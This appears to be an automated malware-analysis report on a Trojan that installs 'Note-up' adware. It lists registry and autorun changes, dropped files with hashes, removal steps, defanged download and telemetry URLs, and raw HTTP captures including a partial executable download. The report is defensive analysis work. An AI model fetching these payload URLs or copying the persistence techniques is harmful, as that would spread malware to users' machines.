[HKCR\CLSID\{DD81E8DB-AD66-43C0-8600-F6C26C928A5A}\InprocServer32]
"(Default)" = "%Program Files%\Note-up\noteupshell0.dll"
[HKCR\CLSID\{DD81E8DB-AD66-43C0-8600-F6C26C928A5A}]
"(Default)" = "Add event reminder"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{DD81E8DB-AD66-43C0-8600-F6C26C928A5A}" = "Add event reminder"
[HKCR\Directory\shellex\ContextMenuHandlers\Add event reminder]
"TypeID" = "15"
[HKCR\Directory\Background\shellex\ContextMenuHandlers\Add event reminder]
"(Default)" = "{DD81E8DB-AD66-43C0-8600-F6C26C928A5A}"
[HKCR\AllFilesystemObjects\shellex\ContextMenuHandlers\Add event reminder]
"TypeID" = "15"
[HKCR\Drive\shellex\ContextMenuHandlers\Add event reminder]
"TypeID" = "15"
[HKCR\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\shellex\ContextMenuHandlers\Add event reminder]
"TypeID" = "13"
"(Default)" = "{DD81E8DB-AD66-43C0-8600-F6C26C928A5A}"
[HKCR\Drive\shellex\ContextMenuHandlers\Add event reminder]
"(Default)" = "{DD81E8DB-AD66-43C0-8600-F6C26C928A5A}"
[HKCR\Directory\Background\shellex\ContextMenuHandlers\Add event reminder]
"TypeID" = "11"
[HKCR\CLSID\{DD81E8DB-AD66-43C0-8600-F6C26C928A5A}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\AllFilesystemObjects\shellex\ContextMenuHandlers\Add event reminder]
"(Default)" = "{DD81E8DB-AD66-43C0-8600-F6C26C928A5A}"
[HKCR\Directory\shellex\ContextMenuHandlers\Add event reminder]
"(Default)" = "{DD81E8DB-AD66-43C0-8600-F6C26C928A5A}"
The process %original file name%.exe:308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A 69 12 F3 A5 FF 1A CB CB 8C 6A F5 58 3A 8C 65"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
cf8ebc7d6a3245d64ee155819d2a628e | c:\Documents and Settings\"%CurrentUserName%"\Application Data\NUIns\NUIns.exe |
f2e53eda1a543681c6bb02ba68501ad9 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\NUIns\Uninstall.exe |
2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe |
6e108fa5f16d2ab00886f0619f6b2d25 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd33.tmp\ProcessKiller.dll |
583e342e2d7bbd98a5a4ab760654a0c8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh30.tmp |
8501f079ef3fc63721d0164b8a34b4a9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr8.tmp |
cf8ebc7d6a3245d64ee155819d2a628e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz2.tmp |
583e342e2d7bbd98a5a4ab760654a0c8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Note-UP_Setup[1].exe |
8501f079ef3fc63721d0164b8a34b4a9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\check[1].exe |
2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Validate[1].exe |
f2e53eda1a543681c6bb02ba68501ad9 | c:\Program Files\D0344D56-1445843908-DA1F-4A65-5000DA5C9464\Uninstall.exe |
cf8ebc7d6a3245d64ee155819d2a628e | c:\Program Files\D0344D56-1445843908-DA1F-4A65-5000DA5C9464\vnsb2D.tmp |
07cdbcd2122577053874ecc640e111c7 | c:\Program Files\Note-up\Note-up.exe |
2d14118831ede18cea992caedb834c58 | c:\Program Files\Note-up\noteupshell0.dll |
01d2285d1ec4d486b8841d029c54f96c | c:\Program Files\Note-up\uninstall.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nsr8.tmp:592
Note-up.exe:380
nsz2.tmp:928
nsh30.tmp:644
nsc15.tmp:1864
regsvr32.exe:1924
%original file name%.exe:308 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsm10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqC.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc15.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd16.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss13.tmp (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbB.tmp (11755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswF.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm25.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\heu39T.nss (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi31.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk29.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Note-UP_Setup[1].exe (143896 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Application Data\NUIns\Uninstall.exe (1257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1E.tmp (15 bytes)
%Program Files%\D0344D56-1445843908-DA1F-4A65-5000DA5C9464\vnsb2D.tmp (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl22.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr8.tmp (12984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp (15 bytes)
%Documents and Settings%\%current user%\Application Data\NUIns\NUIns.exe (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm26.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh30.tmp (143896 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl6.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbE.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl21.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd18.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Program Files%\D0344D56-1445843908-DA1F-4A65-5000DA5C9464\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\check[1].exe (12984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk20.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl2B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl2C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (115980 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl24.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl6.tmp\IpConfig.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl6.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu28.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst34.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu27.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp\InvokeShellVerb.dll (4 bytes)
%Program Files%\Note-up\Note-up.exe (136249 bytes)
%Program Files%\Note-up\uninstall.exe (1686 bytes)
%Documents and Settings%\%current user%\Desktop\Note-Up.lnk (1 bytes)
%Program Files%\Note-up\noteupshell0.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp\FindProcDLL.dll (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp\ProcessKiller.dll (77 bytes)
%Program Files%\Note-up\Note-up.ico (2104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp (34013 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Note-up" = "%Program Files%\Note-up\note-up.exe /watch" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 782336 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 974848 | 1736 | 2048 | 2.02489 | cbb9fea95082627d2fea8d8f9c8189eb |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 104
b6880f11e1f4cf7bd5fd7baa5af42294
fba830ec72947de9e35db9e2b4d42c3e
986b19d069cf0ce15baa40f3c1ae2bcf
4d2abc93d839057a3a0f69ac312266ca
193c2dc649b8195fb99ba6d9a4800935
6169e1e69bff5d80da4ba8bd57230b9e
6fef3b40de926f03c2872c8b043db1ee
4c633cf8551319c40c4e937314c85b40
0e1739fb38518bdf6b6d211a420a2261
0fcf7edf2968af90beb49b929c14d3f2
f81ec225f34f5f9114475d14acc77c07
32b0dd4ada7fd6741737c4fb3b640828
4255e95b12d72a834a480818c30a185f
03564fd07ea7f021ecd60bc9aef7b8ab
249bde48b647c53379627edccc039e99
a576590e91169f1240cccccb73a149e2
7f52e2e974df39c4c27fa112aab679a4
0b528ce9c13b207b093859f757703e7d
e0919f5ec9c9e750362ca45a8ccfd343
59c7d273e5f4b4728f6499138a02a3bc
21bff53f98cb462c199f6d34d80b3d88
752bfe5611660c4dc0db2ce756fb3649
9fa145fcd5fde7ee2ada31587a19f0dc
2f545c4174ffb2ace26fa9746a282c7e
2629e88e7ff580c648328cf1f8f44256
6b80491ccab2e1de29124e779a8d4f50
Network Activity
URLs
URL | IP |
---|---|
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 54.243.78.255 |
hxxp://livestatscounter.com/countstats/count.php | 95.211.189.17 |
hxxp://livestatscounter.com/SysInfo/Validate.exe | 95.211.189.17 |
hxxp://livestatscounter.com/Generic/vos.php?ch=NU&rdsn=0&idn=0&sid=&isnw=2&civ=2&or=st&pac=NU&guidv=2&vpname=&prdk=&tst= | 95.211.189.17 |
hxxp://livestatscounter.com/vuupc/stats.php | 95.211.189.17 |
hxxp://d16hr9n7t75k58.cloudfront.net/Note-UP_Setup.exe | 54.192.93.211 |
hxxp://download-servers.com/SysInfo/Validate.exe | 95.211.189.6 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Mon, 26 Oct 2015 07:18:19 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 May 2015 16:16:55 GMT
Connection: keep-alive
ETag: "55561bf7-f21d"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.......................... ...............................................t...........C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....C.......D...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Mon, 26 Oct 2015 07:18:19 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 May 2015 16:16:55 GMT
Connection: keep-alive
ETag: "55561bf7-f21d"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.......................... ...............................................t...........C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....C.......D...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 150
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3530\",\"guid\": \"\",\"channel_id\": \"\", \"utm_addition\":\"pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:02 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 187
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4587\",\"guid\": \"\",\"channel_id\": \"\", \"utm_addition\":\"command_parameters=/ch= /start /p=NU&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:02 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Mon, 26 Oct 2015 07:18:02 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 187
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4586\",\"guid\": \"\",\"channel_id\": \"\", \"utm_addition\":\"command_parameters=/ch= /start /p=NU&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:18 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 187
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3531\",\"guid\": \"\",\"channel_id\": \"\", \"utm_addition\":\"command_parameters=/ch= /start /p=NU&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:18 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 187
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3532\",\"guid\": \"\",\"channel_id\": \"\", \"utm_addition\":\"command_parameters=/ch= /start /p=NU&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:18 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Mon, 26 Oct 2015 07:18:18 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 223
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3533\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"command_parameters=/ch= /start /p=NU&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:19 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 223
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3220\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"command_parameters=/ch= /start /p=NU&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:19 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 249
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3412\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"dloc_stage=1&command_parameters=/ch= /start /p=NU&vostage=main&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:19 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 249
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3413\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"dloc_stage=2&command_parameters=/ch= /start /p=NU&vostage=main&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:19 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 249
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3414\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"dloc_stage=3&command_parameters=/ch= /start /p=NU&vostage=main&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:19 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 244
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3216\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"value=1&command_parameters=/ch= /start /p=NU&vostage=main&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:20 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 249
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3415\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"dloc_stage=4&command_parameters=/ch= /start /p=NU&vostage=main&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:20 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 249
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3416\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"dloc_stage=5&command_parameters=/ch= /start /p=NU&vostage=main&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:20 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 249
Connection: Keep-Alive
Cache-Control: no-cache
